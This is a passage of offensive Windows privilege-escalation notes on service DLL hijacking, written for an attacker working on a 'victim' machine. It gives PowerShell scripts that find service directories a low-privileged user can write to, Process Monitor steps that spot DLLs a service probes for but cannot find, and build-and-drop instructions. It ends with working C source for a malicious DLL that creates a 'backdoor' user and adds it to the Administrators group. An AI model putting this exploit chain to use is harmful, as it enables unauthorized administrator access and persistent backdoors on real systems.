We can use Process Monitor, or any monitoring tool already on the system, to enumerate the DLLs a running service loads (and the ones it looks for but never finds). If nothing usable is installed, or what is there cannot be run under our permissions, we may have to bring our own Process Monitor binary onto the box.
NOTE: If the DLL list is empty, the service is probably not running. Restart it and watch the DLLs it loads at start-up. Restarting needs start/stop rights on the service itself (sc sdshow <name> shows its DACL); if we lack them, the load only happens on the next reboot or when an administrator restarts it.
Restarting the Service
PS> Restart-Service BetaService
Enumerating Permissions
Once we've enumerated the installed services and found one of interest, we check the permissions on its binary, on the directory the binary lives in, and on the DLLs it loads. Use the icacls Windows utility or the PowerShell cmdlet Get-Acl. The icacls masks read as follows:

MASK  PERMISSIONS
F     Full access
M     Modify access
RX    Read and execute access
R     Read-only access
W     Write-only access

What we want is W (or M or F, which include it) on the directory the service loads a DLL from, granted to our own user, BUILTIN\Users, Authenticated Users or Everyone. Read or execute alone is no use: we need to drop a file there.
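The enumeration and permission steps above, as one added PowerShell example (not part of the original notes): it collects the principals our token carries, walks every non-Windows service, reads the ACL of the directory its binary lives in with Get-Acl, and reports the ones a principal of ours can write to; it then lists the DLLs a running service has loaded. "BetaService" is the notes' own example name; the helper names are ours.

```powershell
# Added example, not part of the original notes: find services whose binary directory our
# current token can write to, then list the DLLs a running service has loaded.
# "BetaService" is the notes' example name; the function names are assumptions of this example.

# Principals our token carries: our own name, our groups, and Everyone
$me         = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$principals = @($me.Name, 'Everyone')
foreach ($g in $me.Groups) {
    try { $principals += $g.Translate([System.Security.Principal.NTAccount]).Value } catch { }
}

# Does an Allow ACE grant rights that let us drop a file into the directory?
# Deny ACEs are not evaluated here; a matching Deny would override a hit reported below.
function Test-WriteAce {
    param([System.Security.AccessControl.FileSystemAccessRule]$Ace)
    $rights   = [int]$Ace.FileSystemRights
    $specific = [int]([System.Security.AccessControl.FileSystemRights]'CreateFiles, AppendData')  # WriteData | AppendData
    $generic  = 0x40000000 -bor 0x10000000   # GENERIC_WRITE | GENERIC_ALL, which Get-Acl reports as raw bits
    return ($Ace.AccessControlType -eq 'Allow') -and
           ((($rights -band $specific) -ne 0) -or (($rights -band $generic) -ne 0))
}

# Non-Windows services, the directory their binary lives in, and which of our principals can write there
function Get-WritableServiceDirs {
    param([string[]]$Principals)
    foreach ($svc in Get-CimInstance Win32_Service) {
        if (-not $svc.PathName -or $svc.PathName -like '*\Windows\*') { continue }
        # Recover the binary path: the quoted part, or the first token of an unquoted path
        # (an unquoted path containing spaces is a separate finding of its own)
        $exe = if ($svc.PathName -match '^"([^"]+)"') { $Matches[1] } else { ($svc.PathName -split '\s+')[0] }
        $dir = Split-Path -Parent $exe
        if (-not $dir -or -not (Test-Path -LiteralPath $dir)) { continue }
        try { $acl = Get-Acl -LiteralPath $dir } catch { continue }
        $hits = @($acl.Access | Where-Object { ($Principals -contains $_.IdentityReference.Value) -and (Test-WriteAce $_) })
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Service    = $svc.Name
                RunsAs     = $svc.StartName          # the account our DLL will execute as
                State      = $svc.State
                Binary     = $exe
                Dir        = $dir
                WritableBy = ($hits | ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique) -join ', '
            }
        }
    }
}

# DLLs currently loaded by a running service. Needs read access to the process, so a
# service running as SYSTEM usually answers "Access denied" to a low-privileged user.
function Get-ServiceModules {
    param([string]$Name)
    $procId = (Get-CimInstance Win32_Service -Filter "Name='$Name'").ProcessId
    if (-not $procId) { Write-Warning "$Name is not running; Restart-Service $Name and retry"; return }
    try { (Get-Process -Id $procId -ErrorAction Stop).Modules | Select-Object ModuleName, FileName }
    catch { Write-Warning "cannot read modules of PID ${procId}: $_" }
}

# Usage
$findings = Get-WritableServiceDirs -Principals $principals
$findings | Format-Table -AutoSize
foreach ($f in $findings) { icacls $f.Dir }   # cross-check against the mask table: W, M or F for one of our principals
Get-ServiceModules -Name 'BetaService'
```

The ACL read is quiet (no files are touched), which is why it is preferred over simply trying to create a file in each directory. When a service shows up as writable but Get-ServiceModules is denied, fall back to Process Monitor to see what the service loads, as in the next section.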
Enumerating DLLs with ProcessExplorer
If we have RDP (or any interactive session), SysInternals' Process Explorer shows the DLLs a running process has loaded (select the process, then View > Lower Pane View > DLLs). Process Monitor shows the loads that failed, which is what a hijack needs.
Download ProcessExplorer & ProcessMonitor to the victim.
Launch Process Monitor and set a filter for Result is “NAME NOT FOUND”; adding Operation is CreateFile and Path ends with .dll cuts the noise down to DLL probes. A DLL the service looks for but that does not exist, in a directory we can write to (see the permissions check above), is the hijack candidate: the loader walks the search order, so the first such directory wins.
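The same triage done from the command line, as an added example (not from the original notes): Process Monitor is driven with its own switches, the export is reduced to "DLL probed but not found" events per process, and each candidate directory is tested for write access. The capture commands are left as comments because they need procmon.exe on the box; the CSV rows are constructed sample data in Procmon's export column layout, and "BetaService"/"BetaServ.exe" are assumed names.

```powershell
# Added example, not part of the original notes. Capture while the service restarts, then
# export the log as CSV (Procmon's own switches; assumes procmon.exe in the current directory):
#   .\Procmon.exe /AcceptEula /Quiet /Minimized /BackingFile C:\Temp\cap.pml
#   Restart-Service BetaService
#   .\Procmon.exe /Terminate
#   .\Procmon.exe /OpenLog C:\Temp\cap.pml /SaveAs C:\Temp\cap.csv
#   $events = Import-Csv C:\Temp\cap.csv

# Constructed sample rows standing in for the real export ("BetaServ.exe" is an assumed name)
$sampleCsv = @'
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:02:11.0012345 AM","BetaServ.exe","4120","CreateFile","C:\Program Files\Beta\hijackme.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:02:11.0012400 AM","BetaServ.exe","4120","CreateFile","C:\Windows\System32\hijackme.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:02:11.0012500 AM","BetaServ.exe","4120","CreateFile","C:\Windows\System32\kernel32.dll","SUCCESS","Desired Access: Read Attributes"
"10:02:11.0013000 AM","svchost.exe","912","CreateFile","C:\Windows\System32\wbem\missing.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:02:11.0013100 AM","BetaServ.exe","4120","CreateFile","C:\Program Files\Beta\config.ini","NAME NOT FOUND","Desired Access: Generic Read"
'@
$events = $sampleCsv | ConvertFrom-Csv

# Effective-access test: create and remove a throwaway file. This touches disk, so it leaves a
# file-audit/EDR trail; read the ACL instead (previous section) when that matters.
function Test-DirWritable([string]$Dir) {
    if (-not $Dir -or -not (Test-Path -LiteralPath $Dir)) { return $false }
    $probe = Join-Path $Dir ([IO.Path]::GetRandomFileName())
    try { [IO.File]::WriteAllText($probe, ''); Remove-Item -LiteralPath $probe -Force; return $true } catch { return $false }
}

# Missing DLL probes, one row per path, with the processes that asked for it
function Get-MissingDlls {
    param([object[]]$Events, [string]$ProcessName)
    $Events |
        Where-Object { $_.Result -eq 'NAME NOT FOUND' -and $_.Operation -eq 'CreateFile' -and $_.Path -match '\.dll$' } |
        Where-Object { -not $ProcessName -or $_.'Process Name' -eq $ProcessName } |
        Group-Object -Property Path |
        ForEach-Object {
            [pscustomobject]@{
                Path      = $_.Name
                Probes    = $_.Count
                Processes = ($_.Group | ForEach-Object { $_.'Process Name' } | Sort-Object -Unique) -join ', '
                Writable  = Test-DirWritable (Split-Path -Parent $_.Name)
            }
        }
}

Get-MissingDlls -Events $events -ProcessName 'BetaServ.exe' | Format-Table -AutoSize
# A row whose directory is writable is where the payload DLL goes, under exactly that file name.
# On the sample data only the two hijackme.dll probes survive the filter; config.ini and the
# svchost.exe probe are dropped.
```

Filtering on CreateFile with a .dll suffix is the same cut the GUI filter makes; the search order matters because the service's own directory is probed before System32, so a writable application directory beats a missing DLL deeper in the path.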
Create Malicious DLL
There are many types of malicious DLLs we can execute on our victim. For more information view: Malware Development
Adds Administrative User w/ Net Command
#include <stdlib.h>
#include <windows.h>

// Build with a toolchain matching the service's bitness (a 64-bit service only loads a 64-bit DLL).
// Assumed mingw-w64 command: x86_64-w64-mingw32-gcc -shared -o hijackme.dll hijackme.c
// Drop the result under the exact name the service probes for, in the writable directory found earlier.
BOOL APIENTRY DllMain(
    HANDLE hModule,             // Handle to DLL module
    DWORD ul_reason_for_call,   // Reason for calling function
    LPVOID lpReserved )         // Reserved
{
    (void)hModule;
    (void)lpReserved;
    switch ( ul_reason_for_call )
    {
    case DLL_PROCESS_ATTACH:    // A process is loading the DLL: this runs as the service account (often SYSTEM).
    {                           // Braces are required: C does not allow a declaration directly after a case label.
        int i;
        // system() spawns cmd.exe from inside DllMain, i.e. under the loader lock. Fine for this
        // quick payload, but a sturdier DLL does its work in a new thread or outside DllMain.
        i = system("net user backdoor password123! /add");
        i = system("net localgroup administrators backdoor /add");
        (void)i;                // return codes ignored; check "net user" afterwards to confirm
        break;
    }
    case DLL_THREAD_ATTACH:     // A process is creating a new thread.
        break;
    case DLL_THREAD_DETACH:     // A thread exits normally.
        break;
    case DLL_PROCESS_DETACH:    // A process unloads the DLL.
        break;
    }
    return TRUE;                // FALSE here would make the load fail and may crash the service
}